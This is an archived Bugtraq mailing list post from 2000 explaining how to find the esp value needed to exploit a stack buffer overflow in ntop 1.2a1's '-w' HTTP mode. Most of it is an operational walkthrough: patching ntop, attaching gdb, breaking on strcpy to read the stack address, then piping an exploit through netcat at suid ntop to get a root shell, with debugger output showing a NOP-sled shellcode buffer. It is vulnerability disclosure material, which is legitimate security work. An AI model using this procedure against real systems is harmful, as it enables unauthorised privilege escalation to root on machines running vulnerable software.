Bugtraq mailing list archives
How to find ntop -w esp value.
From: JW Oh <mat () IVNTECH COM>
Date: Thu, 26 Oct 2000 13:32:41 +0900
1. [on victim host] First modify ntop-1.2a1 src code to execute it with non-root priviledge. and compile it. ntop.c:362 if((0 && (rFileName == NULL) && (getuid () && geteuid ()) || setuid (0)) ){ 2. [on local host] do "tcpdump -w somefile" to get tcpdump file to feed ntop. copy it to victim host. 3. [on victim host] execute following with our modified ntop $ ./ntop -w 8080 -f somefile Warning: unable to read file '.ntop'. No security will be used! Waiting for HTTP connections on port 8080... 4. [on victim host] run gdb to attach our ntop process. and break at function returnHTTPPage. $ gdb ./ntop 2634 (gdb) break returnHTTPPage Breakpoint 1 at 0x8051350 (gdb) cont Continuing. [Switching to Thread 28851] 5. [on local host] execute exploit to victim host $ ./ntop-w-exp | nc victim 8080 5. [on victim host] gdb will stop at breakpoint returnHTTPPage. then you set break point on function strcpy, and then continue, then gdb will stop at strcpy breakpoint. The value of "dest=0xbefffb00" is the location of stack we will use as esp value. Breakpoint 1, 0x8051350 in returnHTTPPage () (gdb) break strcpy Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33. (gdb) cont Continuing. Breakpoint 2, strcpy (dest=0xbefffb00 "$爻쓩\017\005\b\b", src=0x8091dc1 '\220' <repeats 50 times>, "圍037^\211v\b1옌210F\a\211F\fs.013\211晋215N\b\215V\f儆2001蜜211鶩儆200汪mes>bin/sh\030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030"...) at ../sysdeps/generic/strcpy.c:33 (gdb) cont Continuing. 6. [on victim host] Now kill our ntop and run suid ntop. $ /usr/local/sbin/ntop -w 8080 7. [on local host] modify esp value in ntop-w-exp.c and execute exploit. you can set offset with first argument to ntop-w-exp. I think offset must be minus value. $ ./ntop-w-exp | nc victim 8080 8. [on victim host] You will get root shell. ================================================= | | | mat () hacksware com | | | =================================================
Current thread:
- How to find ntop -w esp value. JW Oh (Oct 27)